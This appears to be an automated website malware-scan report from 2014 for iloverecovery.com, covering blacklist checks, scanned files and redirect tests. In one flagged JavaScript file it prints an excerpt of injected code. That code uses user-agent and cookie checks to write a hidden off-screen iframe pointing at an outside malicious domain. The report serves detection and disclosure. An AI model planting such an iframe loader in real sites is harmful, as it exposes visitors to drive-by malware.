Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iloverecovery.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://iloverecovery.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://iloverecovery.com/ | 200 OK Content-Length: 38397 Content-Type: text/html | clean |
http://iloverecovery.com/wp-content/w3tc/min/index.php?file=e1da50c8.347245.js | 200 OK Content-Length: 136432 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: stigelmastu.gostareshbazar.net ...[160 bytes skipped]... pize?decodeURIComponent(Smilepize[1]):undefined;} function Pleos_Aflertuder(){var r_amblartide=navigator.userAgent;var Yellowgrand=(r_amblartide.indexOf("IEMobile")>-1||r_amblartide.indexOf("Windows NT 6.3")>-1||r_amblartide.indexOf("Chrome")>-1||r_amblartide.indexOf("Windows")<+1);var Ultrastilus=(getCookie("Garamg18usality")===undefined);if(!Yellowgrand&&Ultrastilus){document.write('<iframe src="http://stigelmastu.gostareshbazar.net/brabuislaoi16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>');var date=new Date(new Date().getTime()+66*60*60*1000);document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString();}} Pleos_Aflertuder();function convertEntities(b){var d,a;d=fun ...[2968 bytes skipped]... Malicious iFrame found. size: 100x100 src: http://stigelmastu.gostareshbazar.net/brabuislaoi16.html This URL is marked by Google as suspicious <iframe src="http://stigelmastu.gostareshbazar.net/brabuislaoi16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
http://iloverecovery.com/index.php?ak_action=aktt_js&v=2.4 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://partner.googleadservices.com/gampad/google_service.js | 200 OK Content-Length: 3868 Content-Type: text/javascript | clean |
http://stats.wordpress.com/e-201437.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://twitter.com/javascripts/blogger.js | HTTP/1.1 301 Moved Permanently Date: Mon, 15 Sep 2014 01:00:32 UTC Location: https://twitter.com/javascripts/blogger.js Server: tsa_a Content-Length: 0 Set-Cookie: guest_id=v1%3A141074283294241739; Domain=.twitter.com; Path=/; Expires=Wed, 14-Sep-2016 01:00:32 UTC X-Connection-Hash: 487da09786125417855b214af4421775 | clean |
https://twitter.com/javascripts/blogger.js | 404 Not Found Content-Length: 4311 Content-Type: text/html | clean |
https://abs.twimg.com/errors/404-4f54405af9c0bcdecbe656ca8893f7a9.js | 200 OK Content-Length: 10803 Content-Type: application/javascript | clean |
https://twitter.com/ | 200 OK Content-Length: 55684 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/en/init.22da4aa566c643ee186bfaef8f1b23242f30c8e0.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=id | 200 OK Content-Length: 56142 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/id/init.e6c1ece0bb69710333d48f0033be5625111bddba.js | 200 OK Content-Length: 303549 Content-Type: application/javascript | clean |
https://twitter.com/?lang=msa | 200 OK Content-Length: 56310 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/msa/init.847587320b11ec0e2588f620c9f02da5be5ba402.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=cs | 200 OK Content-Length: 56582 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/cs/init.98699024350dd196411a1e82ec30a844cc59029b.js | 200 OK Content-Length: 303263 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iloverecovery.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 01:00:27 GMT
Accept-Ranges: bytes
Server: Apache/2.2.22
Vary: Accept-Encoding,Cookie
Content-Length: 38397
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 14 Sep 2014 10:09:10 GMT
X-Pingback: http://iloverecovery.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.2.4
...38397 bytes of data.
GET / HTTP/1.1
Host: iloverecovery.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 01:00:27 GMT
Accept-Ranges: bytes
Server: Apache/2.2.22
Vary: Accept-Encoding,Cookie
Content-Length: 38397
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 14 Sep 2014 10:09:10 GMT
X-Pingback: http://iloverecovery.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.2.4
...38397 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iloverecovery.com
Referer: http://www.google.com/search?q=iloverecovery.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iloverecovery.com
Referer: http://www.google.com/search?q=iloverecovery.com
Result:
The result is similar to the first query. There are no suspicious redirects found.